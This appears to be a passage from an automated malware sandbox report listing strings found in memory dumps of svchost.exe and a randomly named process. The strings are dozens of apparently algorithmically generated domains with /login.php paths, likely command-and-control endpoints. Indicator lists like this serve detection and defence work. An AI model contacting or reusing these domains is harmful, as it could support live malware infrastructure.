Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522449527.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522570202.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyhob.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyhys.com/
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahypoz.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794566523.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713830346.0000000005A69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqah.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668590498.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668142095.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1948330211.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqas.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620757969.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620677895.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618514695.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620758729.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621135281.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621261518.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617312754.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyraw.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600952988.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599472059.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600106143.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600135684.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600430482.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600576251.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600797663.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvew.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638005.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880220703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvuh.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyzez.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1909219992.0000000005A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyziw.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899366935.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galycah.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydyw.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfyb.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyhib.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600952988.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600106143.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600135684.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600430482.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600576251.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600797663.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyhiw.com/login.php
Source: svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691597706.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://galykes.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galykiz.com/
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galykiz.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790951428.0000000005A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2669210430.0000000005A5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589542688.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynuh.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656748917.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655106952.000000000327E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655014945.000000000327E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654557673.000000000327E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypob.com/login.php
Source: svchost.exe, 00000002.00000003.1711149824.000000000338E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009322000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://galyqaz.com/login.phpSSC:
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624452735.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyquw.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvuz.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899366935.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908042179.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfuz.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhab.com/login.php
Source: svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084822511.000000000CD2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078523532.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087427396.000000000CD2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735650699.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhus.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganykaz.com/
